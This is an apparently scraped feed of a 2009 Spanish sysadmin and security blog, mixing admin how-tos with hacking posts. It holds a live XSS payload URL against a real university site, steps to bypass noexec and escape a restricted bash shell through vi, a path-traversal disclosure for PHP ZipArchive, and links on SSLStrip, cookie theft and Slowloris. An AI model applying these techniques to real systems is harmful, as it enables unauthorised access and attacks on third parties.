width="1"/>http://feedproxy.google.com/~r/unixCiscoHacks/~3/l0kBwvcpck8/y-sigue-el-culebron-smallest-gnulinux.htmlnoreply@blogger.com (vlan7)0http://vlan7.blogspot.com/2009/07/y-sigue-el-culebron-smallest-gnulinux.htmltag:blogger.com,1999:blog-23164839.post-9179430346985097127Sat, 04 Jul 2009 07:26:00 +00002009-07-06T15:44:59.147+02:00XSSEl otro dia estuve jugando con XSS, y mande algunos a la conocida xssed.com<br /><br /><a href="http://www.xssed.com/archive/author=vlan7/"><b>http://www.xssed.com/archive/author=vlan7/</b></a><br /><br />Quiero dedicar primero muy especialmente este:<br /><br /><a href="http://www.lsi.upc.edu/search?Creator=admin&sort_on=1%3E%27%3E%3Cscript%3Ealert(%22XSS%20by%20vlan7%22)%3C/script%3E"><b>http://www.lsi.upc.edu</b></a><br /><br />dedicado, con cariño, a todos los profesores que tuve que aguantar en su dia del departamento de LSI de la FIB de la UPC; por prohibir las soluciones ingeniosas en sus estupidos problemas. Si por ellos fuera nunca aprendo.<br /><br />Mande varios, pero yo me quedo con ese.<br /><br />Stay clean,<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/23164839-9179430346985097127?l=vlan7.blogspot.com'/></div><img src="http://feeds.feedburner.com/~r/unixCiscoHacks/~4/2zuQGV93LKk" height="1" width="1"/>http://feedproxy.google.com/~r/unixCiscoHacks/~3/2zuQGV93LKk/xss.htmlnoreply@blogger.com (vlan7)0http://vlan7.blogspot.com/2009/07/xss.htmltag:blogger.com,1999:blog-23164839.post-4351948774202818761Sat, 27 Jun 2009 08:00:00 +00002009-06-27T10:01:11.591+02:00postfix + logrotateLOGUEANDO 2 INSTANCIAS DE POSTFIX EN 2 ARCHIVOS DIFERENTES:<br />===========================================================<br /><br />/etc/postfix/main.cf :<br />----------------------<br />syslog_facility=local1<br />syslog_name=postfix_smtpExtern<br /><br />/etc/postfix-out/main.cf :<br />--------------------------<br />syslog_facility=local2<br />syslog_name=postfix_smtpIntern<br /><br />/etc/rsyslog.conf :<br />-------------------<br /># Log anything (except mail) of level info or higher.<br /># Don't log private authentication messages!<br />*.info;mail.none;authpriv.none;cron.none;local1.none;local2.none /var/log/messages<br />(...)<br />local2.* -/var/log/smtpdIntern.log<br />local1.* -/var/log/smtpdExtern.log<br /><br />Reiniciar demonios:<br />-------------------<br />/etc/init.d/rsyslog restart<br />/etc/init.d/postfix restart<br />/etc/init.d/postfix-out restart<br /><br />*********************************************************************************<br /><br />ROTANDO LOS 2 ARCHIVOS DE LOG CON LOGROTATE:<br />============================================<br /><br />/etc/logrotate.d/syslog (Postfix usa syslog):<br />---------------------------------------------<br />/var/log/smtpdIntern.log {<br />sharedscripts<br />missingok<br />weekly<br />compress<br /># delaycompress<br />create<br />postrotate<br />/etc/init.d/rsyslog restart<br />/etc/init.d/postfix-out reload<br />endscript<br />rotate 12<br />mail user@host.com<br />}<br /><br />/var/log/smtpdExtern.log {<br />sharedscripts<br />missingok<br />weekly<br />compress<br /># delaycompress<br />create<br />weekly<br />postrotate<br />/etc/init.d/rsyslog restart<br />/etc/init.d/postfix reload<br />endscript<br />rotate 12<br />mail user@host.com<br />}<br /><br />*********************************************************************************<br /><br />COMPROBACION FORZANDO ROTACIONES CON LOGROTATE:<br />===============================================<br /><br />/usr/sbin/logrotate --force /etc/logrotate.d/syslog<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/23164839-4351948774202818761?l=vlan7.blogspot.com'/></div><img src="http://feeds.feedburner.com/~r/unixCiscoHacks/~4/XSyIHkCgN64" height="1" width="1"/>http://feedproxy.google.com/~r/unixCiscoHacks/~3/XSyIHkCgN64/postfix-logrotate.htmlnoreply@blogger.com (vlan7)0http://vlan7.blogspot.com/2009/06/postfix-logrotate.htmltag:blogger.com,1999:blog-23164839.post-2344248691481073863Wed, 24 Jun 2009 18:58:00 +00002009-06-24T21:01:22.043+02:00WPA + TKIP. Probando con tkiptun-ng<a href="http://www.wadalbertia.org/phpBB2/viewtopic.php?p=55867"><b>http://www.wadalbertia.org/phpBB2/viewtopic.php?p=55867</b></a><br /><br />Gracias a Vic_Thor por la info _de primera mano_, pues es muy dificil encontrar informacion sobre esta herramienta.<br /><br />Ah, salio la version 1.0 para win, aunque no la he probado.<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/23164839-2344248691481073863?l=vlan7.blogspot.com'/></div><img src="http://feeds.feedburner.com/~r/unixCiscoHacks/~4/HTwy79U66JQ" height="1" width="1"/>http://feedproxy.google.com/~r/unixCiscoHacks/~3/HTwy79U66JQ/wpa-tkip-probando-con-tkiptun-ng.htmlnoreply@blogger.com (vlan7)0http://vlan7.blogspot.com/2009/06/wpa-tkip-probando-con-tkiptun-ng.htmltag:blogger.com,1999:blog-23164839.post-4254176827790233008Wed, 24 Jun 2009 18:54:00 +00002009-06-24T20:58:27.624+02:00Slowloris - HTTP DoS<a href="http://www.wadalbertia.org/phpBB2/viewtopic.php?p=55898"><b>http://www.wadalbertia.org/phpBB2/viewtopic.php?p=55898</b></a><br /><br />Gracias Sor_Zitroen por la noticia!<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/23164839-4254176827790233008?l=vlan7.blogspot.com'/></div><img src="http://feeds.feedburner.com/~r/unixCiscoHacks/~4/oAQKtpadvL8" height="1" width="1"/>http://feedproxy.google.com/~r/unixCiscoHacks/~3/oAQKtpadvL8/slowloris-http-dos.htmlnoreply@blogger.com (vlan7)0http://vlan7.blogspot.com/2009/06/slowloris-http-dos.htmltag:blogger.com,1999:blog-23164839.post-5592424073804202161Tue, 23 Jun 2009 08:49:00 +00002009-06-23T10:49:53.290+02:00Jugando a robar cookies con surfjack<a href="http://www.wadalbertia.org/phpBB2/viewtopic.php?p=55853"><b>http://www.wadalbertia.org/phpBB2/viewtopic.php?p=55853</b></a><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/23164839-5592424073804202161?l=vlan7.blogspot.com'/></div><img src="http://feeds.feedburner.com/~r/unixCiscoHacks/~4/oxHR9LitY2A" height="1" width="1"/>http://feedproxy.google.com/~r/unixCiscoHacks/~3/oxHR9LitY2A/jugando-robar-cookies-con-surfjack.htmlnoreply@blogger.com (vlan7)0http://vlan7.blogspot.com/2009/06/jugando-robar-cookies-con-surfjack.htmltag:blogger.com,1999:blog-23164839.post-5698327714125230909Mon, 22 Jun 2009 10:48:00 +00002009-06-22T12:50:37.909+02:00Jugando y burlando a SSL con SSLStrip<b><a href="http://www.wadalbertia.org/phpBB2/viewtopic.php?p=55846">http://www.wadalbertia.org/phpBB2/viewtopic.php?p=55846</a></b><br /><br />PD Gracias al compañero Popolous por el post-it ;)<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/23164839-5698327714125230909?l=vlan7.blogspot.com'/></div><img src="http://feeds.feedburner.com/~r/unixCiscoHacks/~4/UiQ3gRix47w" height="1" width="1"/>http://feedproxy.google.com/~r/unixCiscoHacks/~3/UiQ3gRix47w/jugando-y-burlando-ssl-con-sslstrip.htmlnoreply@blogger.com (vlan7)0http://vlan7.blogspot.com/2009/06/jugando-y-burlando-ssl-con-sslstrip.htmltag:blogger.com,1999:blog-23164839.post-8847377098576919174Wed, 03 Jun 2009 16:35:00 +00002009-06-03T18:38:34.404+02:00VMWare disaster recoveryLa idea es tener una tarea cron que copie las maquinas virtuales de un host fisico a otro host fisico VMWare.<br /><br />No se realiza escritura a disco, pues en VMWare es lo que mas penalizado se ve. Se comprime todo en un lado del tunel ssh, y por el otro lado se va descomprimiendo.<br /><br />Ahi va:<br /><br /><font color="#FF0000"><b>#!/bin/bash<br />#<br />#Copia VMs de FISICA1 a FISICA2 para Disaster Recovery<br />#<br />#vlan7 / 13-5-09<br />#<br /><br />ALERTA=80 #20% espacio libre<br />ssh fisica2 df -HP |grep mapper | awk '{ print $5 " " $1 }' |awk '{ print $1}' | cut -d'%' -f1 >/tmp/output<br />uso=$(cat /tmp/output)<br /><br />if [ $uso -g $ALERTA ]; then<br /> echo "$uso % de espacio utilizado a fisica2, abortando copia" >>/var/log/copiaVMsVMWare.log<br />fi<br /><br />if [ $uso -le $ALERTA ]; then<br /> #host1<br /> echo "Apagando la VM host1 - $(date)" >>/var/log/copiaVMsVMWare.log<br /> vmrun -T server -h https://fisica1:8333/sdk -u user -p passwd stop "[standard] host1/host1.vmx" soft<br /> echo "Apagada la VM host1 - $(date)" >>/var/log/copiaVMsVMWare.log<br /> tar czvf - /var/lib/vmware/Virtual\ Machines/host1/ |ssh fisica2 "cd / ; tar xzvf -"<br /> echo "Encendiendo la VM host1 - $(date)" >>/var/log/copiaVMsVMWare.log<br /> vmrun -T server -h https://fisica1:8333/sdk -u user -p passwd start "[standard] host1/host1.vmx"<br /> echo "Encendida la VM host1 - $(date)" >>/var/log/copiaVMsVMWare.log<br /> <br /> #list all available VMs to log<br /> vmrun -T server -h https://fisica1:8333/sdk -u user -p passwd list >>/var/log/copiaVMsVMWare.log<br />fi<br /><br />#enviando correo<br />tail -100 /var/log/copiaVMsVMWare.log | mail -s "[script] copiaVMsVMWare.sh" user@host.com</b></font><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/23164839-8847377098576919174?l=vlan7.blogspot.com'/></div><img src="http://feeds.feedburner.com/~r/unixCiscoHacks/~4/5P02iuvxV4A" height="1" width="1"/>http://feedproxy.google.com/~r/unixCiscoHacks/~3/5P02iuvxV4A/vmware-disaster-recovery.htmlnoreply@blogger.com (vlan7)0http://vlan7.blogspot.com/2009/06/vmware-disaster-recovery.htmltag:blogger.com,1999:blog-23164839.post-8116508971273797468Fri, 13 Mar 2009 16:29:00 +00002009-03-13T17:31:38.583+01:00Asistente agregar impresoras linea de comandos<font color="#FF0000"><b>RUNDLL32 PRINTUI.DLL,PrintUIEntry /il</b></font><br /><br />Mas ejemplos en <a href="http://www.robvanderwoude.com/2kprintcontrol.php">http://www.robvanderwoude.com/2kprintcontrol.php</a><br /><br />A mi me fue util en una ocasion...<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/23164839-8116508971273797468?l=vlan7.blogspot.com'/></div><img src="http://feeds.feedburner.com/~r/unixCiscoHacks/~4/inRrv6zQ3NY" height="1" width="1"/>http://feedproxy.google.com/~r/unixCiscoHacks/~3/inRrv6zQ3NY/asistente-agregar-impresoras-linea-de.htmlnoreply@blogger.com (vlan7)0http://vlan7.blogspot.com/2009/03/asistente-agregar-impresoras-linea-de.htmltag:blogger.com,1999:blog-23164839.post-6589863941969850011Wed, 25 Feb 2009 18:09:00 +00002009-02-25T19:16:42.865+01:00Equipos wireless iniciar sesion en dominioSi un equipo nunca ha iniciado sesion en un dominio, no tendra guardadas las credenciales en cache. Esto es un problema para equipos wifi que quieran iniciar sesion en el dominio de nuestra organizacion.<br /><br />Y aunque tengan guardadas las credenciales en cache, no se ejecutara en su maquina ningun logonscript.<br /><br />La solucion es cargar y activar la tarjeta wifi antes del inicio de sesion, antes de autenticarse.<br /><br />Yo me quedo con esta manera de hacerlo:<br /><br />1. Usar el servicio Windows Zero Configuration (Inicio de sesion wifi facil o algo asi se llama en castellano)<br /><br />2. regedit. HKLM \ Software \ Microsoft \ WindowsNT \ CurrentVersion \ Winlogon<br />Añadir valor DWORD GpNetworkStartTimeoutPolicyValue 3c (hexa) o 60 (dec)<br /><br />3. regedit. HKLM \ Software \ Policies \ Microsoft \ Windows \ System<br />Añadir valor DWORD GroupPolicyMinTransferRate a 0.<br /><br />Y los clientes ya podran iniciar sesion como si estuvieran conectados a la red cableada.<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/23164839-6589863941969850011?l=vlan7.blogspot.com'/></div><img src="http://feeds.feedburner.com/~r/unixCiscoHacks/~4/_eiG6WxiY0Y" height="1" width="1"/>http://feedproxy.google.com/~r/unixCiscoHacks/~3/_eiG6WxiY0Y/equipos-wireless-iniciar-sesion-en.htmlnoreply@blogger.com (vlan7)1http://vlan7.blogspot.com/2009/02/equipos-wireless-iniciar-sesion-en.htmltag:blogger.com,1999:blog-23164839.post-7589951530620281400Wed, 25 Feb 2009 18:08:00 +00002009-02-25T19:09:36.097+01:00User Profile Deletion Utility (Delprof.exe)<i>Delprof.exe is a command-line utility that you can use to delete user profiles on a local or remote computers running Windows 2000, Windows XP, and Windows Server 2003.</i><br /><br /><a href="http://www.microsoft.com/downloads/details.aspx?familyid=901a9b95-6063-4462-8150-360394e98e1e&displaylang=en"><b>http://www.microsoft.com/downloads/details.aspx?familyid=901a9b95-6063-4462-8150-360394e98e1e&displaylang=en</b></a><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/23164839-7589951530620281400?l=vlan7.blogspot.com'/></div><img src="http://feeds.feedburner.com/~r/unixCiscoHacks/~4/XbDwBAgPnoQ" height="1" width="1"/>http://feedproxy.google.com/~r/unixCiscoHacks/~3/XbDwBAgPnoQ/user-profile-deletion-utility.htmlnoreply@blogger.com (vlan7)0http://vlan7.blogspot.com/2009/02/user-profile-deletion-utility.htmltag:blogger.com,1999:blog-23164839.post-5340317488900437405Tue, 17 Feb 2009 13:34:00 +00002009-02-23T11:33:15.699+01:00VMWare. Ubuntu/Debian eth0 desapareceTras copiar una VM, eth0 desaparece.<br /><br />Asi lo arregle yo:<br /><br />Editar:<br /><br />En Ubuntu: /etc/udev/rules.d/70-persistent-net.rules<br />En Debian: /etc/udev/rules.d/z25-persistent-net.rules<br /><br />Borrar la primera entrada y cambiar en la segunda eth1 por eth0.<br /><br />Reiniciar servicios asociados:<br /><br />/etc/init.d/udev restart<br />/etc/init.d/networking restart<br /><br />No es necesario reiniciar el host.<br /><br />&lt;EDIT 23-2-09&gt;<br />Si seleccionamos mover nos olvidamos de este problema, ya que se mantiene todo el estado de la maquina, direccion MAC incluida. Esto viene bien en un entorno donde se quiera una altadisponibilidad con una VM de backup que en caso de fallo de una podamos levantar la otra.<br />&lt;/EDIT 23-2-09&gt;<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/23164839-5340317488900437405?l=vlan7.blogspot.com'/></div><img src="http://feeds.feedburner.com/~r/unixCiscoHacks/~4/Iylw-HEIpOY" height="1" width="1"/>http://feedproxy.google.com/~r/unixCiscoHacks/~3/Iylw-HEIpOY/vmware-ubuntudebian-eth0-desaparece.htmlnoreply@blogger.com (vlan7)0http://vlan7.blogspot.com/2009/02/vmware-ubuntudebian-eth0-desaparece.htmltag:blogger.com,1999:blog-23164839.post-3457589660910520784Tue, 17 Feb 2009 09:37:00 +00002009-02-17T10:40:18.106+01:00VMWare tools UbuntuClick en Instalar VMWare tools<br /><br />sudo su<br /><br />Montar cdrom<br /><br />tar xzvf VMWare*.tar.gz (a /tmp)<br /><br />apt-get install gcc make<br /><br />apt-get install linux-headers`uname -r`<br /><br />ln -s /usr/src/linux-headers`uname -r` /usr/src/linux<br /><br />./vmware-install.pl<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/23164839-3457589660910520784?l=vlan7.blogspot.com'/></div><img src="http://feeds.feedburner.com/~r/unixCiscoHacks/~4/ZMcK4k8kk-M" height="1" width="1"/>http://feedproxy.google.com/~r/unixCiscoHacks/~3/ZMcK4k8kk-M/vmware-tools-ubuntu.htmlnoreply@blogger.com (vlan7)0http://vlan7.blogspot.com/2009/02/vmware-tools-ubuntu.htmltag:blogger.com,1999:blog-23164839.post-390289073672635467Sat, 14 Feb 2009 11:43:00 +00002009-02-14T12:44:36.000+01:00Win. Ofrecer asistencia remota en la LANhcp://CN=Microsoft%20Corporation,L=Redmond,S=Washington,C=US/Remote%20Assistance/Escalation/Unsolicited/unsolicitedrcui.htm<br /><br />Esto es con permiso del usuario.<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/23164839-390289073672635467?l=vlan7.blogspot.com'/></div><img src="http://feeds.feedburner.com/~r/unixCiscoHacks/~4/ZgxOQ2ORsPI" height="1" width="1"/>http://feedproxy.google.com/~r/unixCiscoHacks/~3/ZgxOQ2ORsPI/win-ofrecer-asistencia-remota-en-la-lan.htmlnoreply@blogger.com (vlan7)0http://vlan7.blogspot.com/2009/02/win-ofrecer-asistencia-remota-en-la-lan.htmltag:blogger.com,1999:blog-23164839.post-8966401669290043673Wed, 28 Jan 2009 20:03:00 +00002009-01-28T21:06:51.641+01:000-day in ZipArchive's PHPHoy me puse en contacto con el "security response team" de PHP sobre un bug que descubri en ZipArchive de PHP que, que yo sepa, no habia sido hecho publico.<br /><br />Pues bien, hoy mismo me han respondido, y como ya esta solucionado, aqui pongo el mail que les mande:<br /><br />On Wed, Jan 28, 2009 at 4:32 PM, vlan7 wrote:<br />> Hi!<br />><br />> Recently I've found a vulnerability in ZipArchive's PHP.<br />><br />> An atacker would overwrite any file doing a directory transversal simply<br />> naming zipped archives somethin' like ../../../../var/www/hack.php<br />><br />> Are you aware of this?<br /><br />Yes, it is fixed in 5.3.0 and partially fixed in 5.2.x (a bug in a<br />zend function did not fix it nicely). Everything should be fien in<br />5.2.9 (RC1 to be released soon).<br /><br />Thanks for your report!<br /><br />Cheers,<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/23164839-8966401669290043673?l=vlan7.blogspot.com'/></div><img src="http://feeds.feedburner.com/~r/unixCiscoHacks/~4/jVyL2fBzv7Y" height="1" width="1"/>http://feedproxy.google.com/~r/unixCiscoHacks/~3/jVyL2fBzv7Y/0-day-in-ziparchives-php.htmlnoreply@blogger.com (vlan7)1http://vlan7.blogspot.com/2009/01/0-day-in-ziparchives-php.htmltag:blogger.com,1999:blog-23164839.post-907719115823418321Wed, 28 Jan 2009 15:10:00 +00002009-01-28T16:11:23.638+01:00html mailto tag encoder antispam<a href="http://rumkin.com/tools/mailto_encoder/custom.php"><b>http://rumkin.com/tools/mailto_encoder/custom.php</b></a><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/23164839-907719115823418321?l=vlan7.blogspot.com'/></div><img src="http://feeds.feedburner.com/~r/unixCiscoHacks/~4/On-0PEPt4Q8" height="1" width="1"/>http://feedproxy.google.com/~r/unixCiscoHacks/~3/On-0PEPt4Q8/html-mailto-tag-encoder-antispam.htmlnoreply@blogger.com (vlan7)0http://vlan7.blogspot.com/2009/01/html-mailto-tag-encoder-antispam.htmltag:blogger.com,1999:blog-23164839.post-3706127306278277980Wed, 28 Jan 2009 14:49:00 +00002009-01-28T16:04:34.861+01:00*nix. Saltando restriccion noexec + evadiendo una shell restrictivaSi un buen administrador ha incluido en el fstab (vfstab en solaris) la opcion noexec para montaje de la particion digamos /home del usuario, su idea seria que el usuario no pudiera ejecutar programas bajados por el, es decir, que residan en la particion montada como noexec.<br /><br />Al intentar ejecutar un script con <b>./script.sh</b><br /><br />No nos lo permite el sistema.<br /><br />Podemos saltarnos esta restriccion anteponiendo el script en el que esta programado. Por ejemplo:<br /><br /><font color=#FF0000><b>/bin/bash script.sh</b></font><br /><br />Para archivos binarios ejecutables, y esto es en Linux:<br /><br /><font color=#FF0000><b>/lib/ld-linux.so.2 binario</b></font><br /><br />Como administradores se nos podria ocurrir quitar el permiso de ejecucion a ld-linux.so.2 , pero ¿que sistema no tiene alguna libreria dinamicamente enlazada? Asi que esa no es una solucion viable.<br /><br />Lo que podemos hacer es dar al usuario una shell restrictiva tipo bash-r como shell por defecto en el /etc/passwd<br /><br />Con esto lo que hacemos es una jaula en la que el usuario no puede ejecutar programas que no esten en el PATH, y por supuesto, no puede modificar la variable PATH.<br /><br />Bien, como todo lo que una mente humana puede asegurar, otra mente humana puede violar, como atacantes procederiamos asi.<br /><br />El viejo editor vi tiene una opcion para ejecutar comandos de shell.<br /><br /><font color=#FF0000><b>probador:~$ cd .. <br />rbash: cd: restricted <br />probador:~$ vi prueba.sh</b></font><br /><br />Y en vi: <br /><br /><font color=#FF0000><b>:set shell=/bin/bash <br />:shell <br />probador:~$ cd .. <br />probador:/home$</b></font><br /><br />Suerte,<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/23164839-3706127306278277980?l=vlan7.blogspot.com'/></div><img src="http://feeds.feedburner.com/~r/unixCiscoHacks/~4/lKQxZzGGCxg" height="1" width="1"/>http://feedproxy.google.com/~r/unixCiscoHacks/~3/lKQxZzGGCxg/nix-saltando-restriccion-noexec.htmlnoreply@blogger.com (vlan7)1http://vlan7.blogspot.com/2009/01/nix-saltando-restriccion-noexec.htmltag:blogger.com,1999:blog-23164839.post-241582134497133552Wed, 28 Jan 2009 12:58:00 +00002009-01-28T14:59:34.780+01:00Sobre espacio ocupado por la bd de Active DirectoryAlgunos administradores lo que hacen para conocer el espacio ocupado por la bd de AD es usar el comando:<br /><br /><font color="#FF0000"><b>ntdsutil files info</b></font><br /><br />El problema es que este comando da error si no es ejecutado en modo Restauracion de AD.<br /><br />Realmente la solucion es mucho mas sencilla. _Toda_ la bd de AD se encuentra en el archivo <b>ntds.dit</b>. Lo que pese el archivo es el tamaño de la bd de AD.<br /><br />Es desfragmentable y es posible ver cuanto espacio en HD podemos ganar (tras eliminar objetos de AD) mediante una desfragmentacion que tanto puede ser online como offline. Google.<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/23164839-241582134497133552?l=vlan7.blogspot.com'/></div><img src="http://feeds.feedburner.com/~r/unixCiscoHacks/~4/4WxNs-Exe4k" height="1" width="1"/>http://feedproxy.google.com/~r/unixCiscoHacks/~3/4WxNs-Exe4k/sobre-espacio-ocupado-por-la-bd-de.htmlnoreply@blogger.com (vlan7)0http://vlan7.blogspot.com/2009/01/sobre-espacio-ocupado-por-la-bd-de.html